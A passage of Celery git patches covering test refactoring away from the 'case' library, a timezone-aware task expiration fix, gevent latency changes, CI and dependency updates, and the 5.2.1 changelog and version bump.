--- a/t/unit/contrib/test_migrate.py
+++ b/t/unit/contrib/test_migrate.py
@@ -3,7 +3,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection, Exchange, Producer, Queue
from kombu.transport.virtual import QoS
from kombu.utils.encoding import ensure_bytes
@@ -14,6 +13,7 @@
migrate_tasks, move, move_by_idmap,
move_by_taskmap, move_task_by_id,
start_filter, task_id_eq, task_id_in)
+from t.unit import conftest
# hack to ignore error at shutdown
QoS.restore_at_shutdown = False
@@ -203,7 +203,7 @@ def test_maybe_queue():
def test_filter_status():
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
filter_status(State(), {'id': '1', 'task': 'add'}, Mock())
assert stdout.getvalue()
diff --git a/t/unit/events/test_snapshot.py b/t/unit/events/test_snapshot.py
index 95b56aca3b5..3dfb01846e9 100644
--- a/t/unit/events/test_snapshot.py
+++ b/t/unit/events/test_snapshot.py
@@ -1,7 +1,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.app.events import Events
from celery.events.snapshot import Polaroid, evcam
@@ -106,8 +105,7 @@ def setup(self):
self.app.events = self.MockEvents()
self.app.events.app = self.app
- @mock.restore_logging()
- def test_evcam(self):
+ def test_evcam(self, restore_logging):
evcam(Polaroid, timer=timer, app=self.app)
evcam(Polaroid, timer=timer, loglevel='CRITICAL', app=self.app)
self.MockReceiver.raise_keyboard_interrupt = True
diff --git a/t/unit/fixups/test_django.py b/t/unit/fixups/test_django.py
index e352b8a7b2f..44938b1a04f 100644
--- a/t/unit/fixups/test_django.py
+++ b/t/unit/fixups/test_django.py
@@ -2,10 +2,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.fixups.django import (DjangoFixup, DjangoWorkerFixup,
FixupWarning, _maybe_close_fd, fixup)
+from t.unit import conftest
class FixupCase:
@@ -54,6 +54,18 @@ def test_autodiscover_tasks(self, patching):
apps.get_app_configs.return_value = configs
assert f.autodiscover_tasks() == [c.name for c in configs]
+ @pytest.mark.masked_modules('django')
+ def test_fixup_no_django(self, patching, mask_modules):
+ with patch('celery.fixups.django.DjangoFixup') as Fixup:
+ patching.setenv('DJANGO_SETTINGS_MODULE', '')
+ fixup(self.app)
+ Fixup.assert_not_called()
+
+ patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
+ with pytest.warns(FixupWarning):
+ fixup(self.app)
+ Fixup.assert_not_called()
+
def test_fixup(self, patching):
with patch('celery.fixups.django.DjangoFixup') as Fixup:
patching.setenv('DJANGO_SETTINGS_MODULE', '')
@@ -61,11 +73,7 @@ def test_fixup(self, patching):
Fixup.assert_not_called()
patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
- with mock.mask_modules('django'):
- with pytest.warns(FixupWarning):
- fixup(self.app)
- Fixup.assert_not_called()
- with mock.module_exists('django'):
+ with conftest.module_exists('django'):
import django
django.VERSION = (1, 11, 1)
fixup(self.app)
@@ -257,17 +265,17 @@ def test_on_worker_ready(self):
f._settings.DEBUG = True
f.on_worker_ready()
- def test_validate_models(self, patching):
- with mock.module('django', 'django.db', 'django.core',
- 'django.core.cache', 'django.conf',
- 'django.db.utils'):
- f = self.Fixup(self.app)
- f.django_setup = Mock(name='django.setup')
- patching.modules('django.core.checks')
- from django.core.checks import run_checks
- f.validate_models()
- f.django_setup.assert_called_with()
- run_checks.assert_called_with()
+ @pytest.mark.patched_module('django', 'django.db', 'django.core',
+ 'django.core.cache', 'django.conf',
+ 'django.db.utils')
+ def test_validate_models(self, patching, module):
+ f = self.Fixup(self.app)
+ f.django_setup = Mock(name='django.setup')
+ patching.modules('django.core.checks')
+ from django.core.checks import run_checks
+ f.validate_models()
+ f.django_setup.assert_called_with()
+ run_checks.assert_called_with()
def test_django_setup(self, patching):
patching('celery.fixups.django.symbol_by_name')
diff --git a/t/unit/security/test_certificate.py b/t/unit/security/test_certificate.py
index 910cb624618..d9f525dad25 100644
--- a/t/unit/security/test_certificate.py
+++ b/t/unit/security/test_certificate.py
@@ -3,10 +3,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.exceptions import SecurityError
from celery.security.certificate import Certificate, CertStore, FSCertStore
+from t.unit import conftest
from . import CERT1, CERT2, KEY1
from .case import SecurityCase
@@ -84,7 +84,7 @@ def test_init(self, Certificate, glob, isdir):
cert.has_expired.return_value = False
isdir.return_value = True
glob.return_value = ['foo.cert']
- with mock.open():
+ with conftest.open():
cert.get_id.return_value = 1
path = os.path.join('var', 'certs')
diff --git a/t/unit/security/test_security.py b/t/unit/security/test_security.py
index 31d682e37be..0b75ffc3619 100644
--- a/t/unit/security/test_security.py
+++ b/t/unit/security/test_security.py
@@ -19,13 +19,13 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.exceptions import SerializerNotInstalled
from kombu.serialization import disable_insecure_serializers, registry
from celery.exceptions import ImproperlyConfigured, SecurityError
from celery.security import disable_untrusted_serializers, setup_security
from celery.security.utils import reraise_errors
+from t.unit import conftest
from . import CERT1, KEY1
from .case import SecurityCase
@@ -120,7 +120,7 @@ def effect(*args):
self.app.conf.task_serializer = 'auth'
self.app.conf.accept_content = ['auth']
- with mock.open(side_effect=effect):
+ with conftest.open(side_effect=effect):
with patch('celery.security.registry') as registry:
store = Mock()
self.app.setup_security(['json'], key, cert, store)
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index f5b4af87003..d170ccd178f 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -4,12 +4,12 @@
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import pytest
-from case import ContextMock
from kombu import Queue
from kombu.exceptions import EncodeError
from celery import Task, group, uuid
from celery.app.task import _reprtask
+from celery.contrib.testing.mocks import ContextMock
from celery.exceptions import Ignore, ImproperlyConfigured, Retry
from celery.result import AsyncResult, EagerResult
from celery.utils.time import parse_iso8601
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index 4100ad56560..1c0a03d9893 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -7,7 +7,6 @@
from unittest.mock import Mock, call, patch
import pytest
-from case import mock
import t.skip
from celery import _find_option_with_arg, platforms
@@ -22,6 +21,7 @@
set_process_title, setgid, setgroups, setuid,
signals)
from celery.utils.text import WhateverIO
+from t.unit import conftest
try:
import resource
@@ -429,7 +429,7 @@ def test_without_resource(self):
@patch('celery.platforms.signals')
@patch('celery.platforms.maybe_drop_privileges')
@patch('os.geteuid')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_default(self, open, geteuid, maybe_drop,
signals, pidlock):
geteuid.return_value = 0
@@ -530,7 +530,7 @@ def test_create_pidlock(self, Pidfile):
p = Pidfile.return_value = Mock()
p.is_locked.return_value = True
p.remove_if_stale.return_value = False
- with mock.stdouts() as (_, err):
+ with conftest.stdouts() as (_, err):
with pytest.raises(SystemExit):
create_pidlock('/var/pid')
assert 'already exists' in err.getvalue()
@@ -567,14 +567,14 @@ def test_is_locked(self, exists):
assert not p.is_locked()
def test_read_pid(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816\n')
s.seek(0)
p = Pidfile('/var/pid')
assert p.read_pid() == 1816
def test_read_pid_partially_written(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('1816')
s.seek(0)
p = Pidfile('/var/pid')
@@ -584,20 +584,20 @@ def test_read_pid_partially_written(self):
def test_read_pid_raises_ENOENT(self):
exc = IOError()
exc.errno = errno.ENOENT
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
assert p.read_pid() is None
def test_read_pid_raises_IOError(self):
exc = IOError()
exc.errno = errno.EAGAIN
- with mock.open(side_effect=exc):
+ with conftest.open(side_effect=exc):
p = Pidfile('/var/pid')
with pytest.raises(IOError):
p.read_pid()
def test_read_pid_bogus_pidfile(self):
- with mock.open() as s:
+ with conftest.open() as s:
s.write('eighteensixteen\n')
s.seek(0)
p = Pidfile('/var/pid')
@@ -655,7 +655,7 @@ def test_remove_if_stale_process_alive(self, kill):
@patch('os.kill')
def test_remove_if_stale_process_dead(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1816
@@ -668,7 +668,7 @@ def test_remove_if_stale_process_dead(self, kill):
p.remove.assert_called_with()
def test_remove_if_stale_broken_pid(self):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.side_effect = ValueError()
@@ -679,7 +679,7 @@ def test_remove_if_stale_broken_pid(self):
@patch('os.kill')
def test_remove_if_stale_unprivileged_user(self, kill):
- with mock.stdouts():
+ with conftest.stdouts():
p = Pidfile('/var/pid')
p.read_pid = Mock()
p.read_pid.return_value = 1817
@@ -704,7 +704,7 @@ def test_remove_if_stale_no_pidfile(self):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
getpid.return_value = 1816
osopen.return_value = 13
@@ -731,7 +731,7 @@ def test_write_pid(self, open_, fdopen, osopen, getpid, fsync):
@patch('os.getpid')
@patch('os.open')
@patch('os.fdopen')
- @patch(mock.open_fqdn)
+ @patch('builtins.open')
def test_write_reread_fails(self, open_, fdopen,
osopen, getpid, fsync):
getpid.return_value = 1816
diff --git a/t/unit/utils/test_serialization.py b/t/unit/utils/test_serialization.py
index 2f625fdb35f..bf83a0d68b5 100644
--- a/t/unit/utils/test_serialization.py
+++ b/t/unit/utils/test_serialization.py
@@ -6,7 +6,6 @@
import pytest
import pytz
-from case import mock
from kombu import Queue
from celery.utils.serialization import (STRTOBOOL_DEFAULT_TABLE,
@@ -18,14 +17,14 @@
class test_AAPickle:
- def test_no_cpickle(self):
+ @pytest.mark.masked_modules('cPickle')
+ def test_no_cpickle(self, mask_modules):
prev = sys.modules.pop('celery.utils.serialization', None)
try:
- with mock.mask_modules('cPickle'):
- import pickle as orig_pickle
+ import pickle as orig_pickle
- from celery.utils.serialization import pickle
- assert pickle.dumps is orig_pickle.dumps
+ from celery.utils.serialization import pickle
+ assert pickle.dumps is orig_pickle.dumps
finally:
sys.modules['celery.utils.serialization'] = prev
diff --git a/t/unit/utils/test_threads.py b/t/unit/utils/test_threads.py
index 758b39e4265..132f3504bc4 100644
--- a/t/unit/utils/test_threads.py
+++ b/t/unit/utils/test_threads.py
@@ -1,10 +1,10 @@
from unittest.mock import patch
import pytest
-from case import mock
from celery.utils.threads import (Local, LocalManager, _FastLocalStack,
_LocalStack, bgThread)
+from t.unit import conftest
class test_bgThread:
@@ -17,7 +17,7 @@ def body(self):
raise KeyError()
with patch('os._exit') as _exit:
- with mock.stdouts():
+ with conftest.stdouts():
_exit.side_effect = ValueError()
t = T()
with pytest.raises(ValueError):
diff --git a/t/unit/worker/test_autoscale.py b/t/unit/worker/test_autoscale.py
index 7cfea789d4b..f6c63c57ac3 100644
--- a/t/unit/worker/test_autoscale.py
+++ b/t/unit/worker/test_autoscale.py
@@ -2,7 +2,7 @@
from time import monotonic
from unittest.mock import Mock, patch
-from case import mock
+import pytest
from celery.concurrency.base import BasePool
from celery.utils.objects import Bunch
@@ -100,8 +100,8 @@ def join(self, timeout=None):
x.stop()
assert not x.joined
- @mock.sleepdeprived(module=autoscale)
- def test_body(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_body(self, sleepdeprived):
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
x.body()
@@ -216,8 +216,8 @@ def body(self):
_exit.assert_called_with(1)
stderr.write.assert_called()
- @mock.sleepdeprived(module=autoscale)
- def test_no_negative_scale(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_no_negative_scale(self, sleepdeprived):
total_num_processes = []
worker = Mock(name='worker')
x = autoscale.Autoscaler(self.pool, 10, 3, worker=worker)
diff --git a/t/unit/worker/test_consumer.py b/t/unit/worker/test_consumer.py
index a11098f37fa..0e7ce90818f 100644
--- a/t/unit/worker/test_consumer.py
+++ b/t/unit/worker/test_consumer.py
@@ -5,8 +5,8 @@
import pytest
from billiard.exceptions import RestartFreqExceeded
-from case import ContextMock
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.collections import LimitedSet
from celery.worker.consumer.agent import Agent
from celery.worker.consumer.consumer import (CANCEL_TASKS_BY_DEFAULT, CLOSE,
diff --git a/t/unit/worker/test_worker.py b/t/unit/worker/test_worker.py
index c49af9af078..c6733e97d1c 100644
--- a/t/unit/worker/test_worker.py
+++ b/t/unit/worker/test_worker.py
@@ -11,7 +11,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection
from kombu.asynchronous import get_event_loop
from kombu.common import QoS, ignore_errors
@@ -804,8 +803,8 @@ def test_with_autoscaler(self):
assert worker.autoscaler
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_autoscaler_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_autoscaler_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance with auto scaling
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
@@ -853,8 +852,8 @@ def test_with_autoscaler_file_descriptor_safety(self):
worker.pool.terminate()
@t.skip.if_win32
- @mock.sleepdeprived(module=autoscale)
- def test_with_file_descriptor_safety(self):
+ @pytest.mark.sleepdeprived_patched_module(autoscale)
+ def test_with_file_descriptor_safety(self, sleepdeprived):
# Given: a test celery worker instance
worker = self.create_worker(
autoscale=[10, 5], use_eventloop=True,
From 431f07d77289149b9064fdc36202a536f86f2994 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?G=C3=A1bor=20Boros?=
Date: Fri, 12 Nov 2021 09:38:21 +0100
Subject: [PATCH 131/177] fix: task expiration is timezone aware if needed
(#7065)
* fix: task expiration is timezone aware if needed
In #6957 the changes introduced checking for datetime objects for task
expiration, though the implementation is not considering that the
expiration date can be set with or without timezone. Therefore the
expiration second calculation for the task can raise a TypeError.
Signed-off-by: Gabor Boros
* chore: add Gabor Boros to contributors list
Signed-off-by: Gabor Boros
---
CONTRIBUTORS.txt | 1 +
celery/app/base.py | 4 ++--
t/unit/tasks/test_tasks.py | 11 +++++++++++
3 files changed, 14 insertions(+), 2 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 5dee5a11685..1c497349f54 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -285,3 +285,4 @@ Garry Lawrence, 2021/06/19
Patrick Zhang, 2017/08/19
Konstantin Kochin, 2021/07/11
kronion, 2021/08/26
+Gabor Boros, 2021/11/09
diff --git a/celery/app/base.py b/celery/app/base.py
index 0b893fddb87..671fc846ac6 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -32,7 +32,7 @@
from celery.utils.imports import gen_task_name, instantiate, symbol_by_name
from celery.utils.log import get_logger
from celery.utils.objects import FallbackContext, mro_lookup
-from celery.utils.time import timezone, to_utc
+from celery.utils.time import maybe_make_aware, timezone, to_utc
# Load all builtin tasks
from . import builtins # noqa
@@ -734,7 +734,7 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
options, route_name or name, args, kwargs, task_type)
if expires is not None:
if isinstance(expires, datetime):
- expires_s = (expires - self.now()).total_seconds()
+ expires_s = (maybe_make_aware(expires) - self.now()).total_seconds()
else:
expires_s = expires
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index d170ccd178f..89689914f26 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -941,6 +941,17 @@ def test_regular_task(self):
name='George Costanza', test_eta=True, test_expires=True,
)
+ # With ETA, absolute expires without timezone.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Constanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=(self.now() + timedelta(hours=2)).replace(tzinfo=None),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Constanza', test_eta=True, test_expires=True,
+ )
+
# With ETA, absolute expires in the past.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'},
From fe37cd834109810dc778845378880abdf7d08ff6 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 12 Nov 2021 18:40:17 +0600
Subject: [PATCH 132/177] minor weaks to github actions (#7078)
* minor weaks to github actions
* lets try windows latest
* update minimum dependencies for some package
* try pypy-3 in tox
* revert tox pypy changes
* try latest pip
* pin eventlet below python 3.10
* pin python3.10
* pin python3.10
* revert to windows 2019 to check if pypy37 pass
---
.github/workflows/python-package.yml | 25 +++++++------------------
requirements/extras/couchbase.txt | 2 +-
requirements/extras/eventlet.txt | 2 +-
requirements/extras/gevent.txt | 2 +-
requirements/extras/redis.txt | 2 +-
5 files changed, 11 insertions(+), 22 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 6807091169f..54fdc3596dc 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -20,13 +20,13 @@ on:
- '.github/workflows/python-package.yml'
jobs:
- build:
+ Unit:
runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
- python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7']
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7','pypy-3.8']
os: ["ubuntu-20.04", "windows-2019"]
steps:
@@ -34,9 +34,9 @@ jobs:
if: startsWith(matrix.os, 'ubuntu-')
run: |
sudo apt update && sudo apt-get install -f libcurl4-openssl-dev libssl-dev gnutls-dev httping expect libmemcached-dev
- - uses: actions/checkout@v2
+ - uses: actions/checkout@v2.4.0
- name: Set up Python ${{ matrix.python-version }}
- uses: actions/setup-python@v2
+ uses: actions/setup-python@v2.2.2
with:
python-version: ${{ matrix.python-version }}
@@ -45,7 +45,7 @@ jobs:
run: |
echo "::set-output name=dir::$(pip cache dir)"
- name: Cache
- uses: actions/cache@v2
+ uses: actions/cache@v2.1.6
with:
path: ${{ steps.pip-cache.outputs.dir }}
key:
@@ -54,7 +54,7 @@ jobs:
${{ matrix.python-version }}-${{matrix.os}}
- name: Install tox
- run: python -m pip install tox tox-gh-actions
+ run: python -m pip install --upgrade pip tox tox-gh-actions
- name: >
Run tox for
"${{ matrix.python-version }}-unit"
@@ -62,20 +62,9 @@ jobs:
run: |
tox --verbose --verbose
- - uses: codecov/codecov-action@v1
+ - uses: codecov/codecov-action@v2.1.0
with:
flags: unittests # optional
fail_ci_if_error: true # optional (default = false)
verbose: true # optional (default = false)
- lint:
- runs-on: ubuntu-latest
- steps:
- - uses: actions/checkout@v2
- - uses: actions/setup-python@v2
- # Must match the Python version in tox.ini for flake8
- with: { python-version: 3.9 }
- - name: Install tox
- run: python -m pip install tox
- - name: Lint with pre-commit
- run: tox --verbose -e lint
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index a86b71297ab..a736d6a7742 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
\ No newline at end of file
diff --git a/requirements/extras/eventlet.txt b/requirements/extras/eventlet.txt
index a25cb65d4f0..047d9cbcbae 100644
--- a/requirements/extras/eventlet.txt
+++ b/requirements/extras/eventlet.txt
@@ -1 +1 @@
-eventlet>=0.26.1; python_version<"3.10"
+eventlet>=0.32.0; python_version<"3.10"
diff --git a/requirements/extras/gevent.txt b/requirements/extras/gevent.txt
index 2fc04b699b3..4d5a00d0fb4 100644
--- a/requirements/extras/gevent.txt
+++ b/requirements/extras/gevent.txt
@@ -1 +1 @@
-gevent>=1.0.0
+gevent>=1.5.0
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index b0d3f0fb748..240ddab80bb 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.2.0
+redis>=3.4.1
From cc5569222db3c1e5bee3a70d679f747940988fec Mon Sep 17 00:00:00 2001
From: mrmaxi
Date: Sun, 14 Nov 2021 15:22:51 +0300
Subject: [PATCH 133/177] fix: reduce latency of AsyncResult.get under gevent
(#7052)
Wakeup waiters in `wait_for` after every `drain_events` occurs instead of only after 1 seconds timeout.
Does not block event loop, because `drain_events` of asynchronous backends with pubsub commonly sleeping for some nonzero time while waiting events.
---
celery/backends/asynchronous.py | 40 +++++++++++++++++++++-------
t/unit/backends/test_asynchronous.py | 10 +++++--
2 files changed, 39 insertions(+), 11 deletions(-)
diff --git a/celery/backends/asynchronous.py b/celery/backends/asynchronous.py
index 32475d5eaa6..cedae5013a8 100644
--- a/celery/backends/asynchronous.py
+++ b/celery/backends/asynchronous.py
@@ -66,18 +66,30 @@ def wait_for(self, p, wait, timeout=None):
class greenletDrainer(Drainer):
spawn = None
_g = None
+ _drain_complete_event = None # event, sended (and recreated) after every drain_events iteration
+
+ def _create_drain_complete_event(self):
+ """create new self._drain_complete_event object"""
+ pass
+
+ def _send_drain_complete_event(self):
+ """raise self._drain_complete_event for wakeup .wait_for"""
+ pass
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._started = threading.Event()
self._stopped = threading.Event()
self._shutdown = threading.Event()
+ self._create_drain_complete_event()
def run(self):
self._started.set()
while not self._stopped.is_set():
try:
self.result_consumer.drain_events(timeout=1)
+ self._send_drain_complete_event()
+ self._create_drain_complete_event()
except socket.timeout:
pass
self._shutdown.set()
@@ -89,8 +101,14 @@ def start(self):
def stop(self):
self._stopped.set()
+ self._send_drain_complete_event()
self._shutdown.wait(THREAD_TIMEOUT_MAX)
+ def wait_for(self, p, wait, timeout=None):
+ self.start()
+ if not p.ready:
+ self._drain_complete_event.wait(timeout=timeout)
+
@register_drainer('eventlet')
class eventletDrainer(greenletDrainer):
@@ -101,10 +119,12 @@ def spawn(self, func):
sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- self.start()
- if not p.ready:
- self._g._exit_event.wait(timeout=timeout)
+ def _create_drain_complete_event(self):
+ from eventlet.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.send()
@register_drainer('gevent')
@@ -116,11 +136,13 @@ def spawn(self, func):
gevent.sleep(0)
return g
- def wait_for(self, p, wait, timeout=None):
- import gevent
- self.start()
- if not p.ready:
- gevent.wait([self._g], timeout=timeout)
+ def _create_drain_complete_event(self):
+ from gevent.event import Event
+ self._drain_complete_event = Event()
+
+ def _send_drain_complete_event(self):
+ self._drain_complete_event.set()
+ self._create_drain_complete_event()
class AsyncBackendMixin:
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index c0fe894900a..6593cd53e5e 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -158,7 +158,10 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import eventlet
- eventlet.sleep(0)
+ # `drain_events` of asynchronous backends with pubsub have to sleep
+ # while waiting events for not more then `interval` timeout,
+ # but events may coming sooner
+ eventlet.sleep(timeout/10)
def schedule_thread(self, thread):
import eventlet
@@ -204,7 +207,10 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import gevent
- gevent.sleep(0)
+ # `drain_events` of asynchronous backends with pubsub have to sleep
+ # while waiting events for not more then `interval` timeout,
+ # but events may coming sooner
+ gevent.sleep(timeout/10)
def schedule_thread(self, thread):
import gevent
From 59f22712db8879e2fc016c5bed504ae49f0b05c1 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Sun, 14 Nov 2021 13:29:03 +0000
Subject: [PATCH 134/177] [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
---
t/unit/backends/test_asynchronous.py | 2 ++
1 file changed, 2 insertions(+)
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index 6593cd53e5e..479fd855838 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -158,6 +158,7 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import eventlet
+
# `drain_events` of asynchronous backends with pubsub have to sleep
# while waiting events for not more then `interval` timeout,
# but events may coming sooner
@@ -207,6 +208,7 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import gevent
+
# `drain_events` of asynchronous backends with pubsub have to sleep
# while waiting events for not more then `interval` timeout,
# but events may coming sooner
From 6b442eb3f2450ede1585e4bae37ee12e6d127947 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 15 Nov 2021 16:41:01 +0000
Subject: [PATCH 135/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/pycqa/isort: 5.10.0 → 5.10.1](https://github.com/pycqa/isort/compare/5.10.0...5.10.1)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 5c7feb69d33..a542597b1c8 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -24,6 +24,6 @@ repos:
- id: mixed-line-ending
- repo: https://github.com/pycqa/isort
- rev: 5.10.0
+ rev: 5.10.1
hooks:
- id: isort
From ddbb67c29dd1137805a2bdf2695cffdbb0d54efa Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 12:10:00 +0600
Subject: [PATCH 136/177] pin redis below v4.0.0 for now to fix kombu
---
requirements/extras/redis.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index 240ddab80bb..6a0c1d208bf 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.4.1
+redis>=3.4.1,<4.0.0
From 83747fdbe8a751713f702bf765fef31d08229dd9 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 20:27:19 +0600
Subject: [PATCH 137/177] bump minimum kombu version to 5.2.2
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index b35e5b393e9..3be20593c97 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>0.dev.0
billiard>=3.6.4.0,<4.0
-kombu>=5.2.1,<6.0
+kombu>=5.2.2,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From 4c92cb745f658382a4eb4b94ba7938d119168165 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 20:52:12 +0600
Subject: [PATCH 138/177] changelog for v5.2.1
---
Changelog.rst | 20 ++++++++++++++++++++
1 file changed, 20 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index 8c94896c0aa..84d02ba3ae2 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,26 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+
+.. _version-5.2.1:
+
+5.2.1
+=======
+:release-date: 2021-11-16 8.55 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Fix rstrip usage on bytes instance in ProxyLogger.
+- Pass logfile to ExecStop in celery.service example systemd file.
+- fix: reduce latency of AsyncResult.get under gevent (#7052)
+- Limit redis version: <4.0.0.
+- Bump min kombu version to 5.2.2.
+- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
+- Remove dependency to case (#7077).
+- fix: task expiration is timezone aware if needed (#7065).
+- Initial testing of pypy-3.8 beta to CI.
+- Docs, CI & tests cleanups.
+
+
.. _version-5.2.0:
5.2.0
From d32356c0e46eefecd164c55899f532c2fed2df57 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 16 Nov 2021 20:55:01 +0600
Subject: [PATCH 139/177] =?UTF-8?q?Bump=20version:=205.2.0=20=E2=86=92=205?=
=?UTF-8?q?.2.1?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 2 +-
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index c09541dd81c..ad96c6ecbea 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0
+current_version = 5.2.1
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 0075875b468..03bbec6f613 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0 (dawn-chorus)
+:Version: 5.2.1 (dawn-chorus)
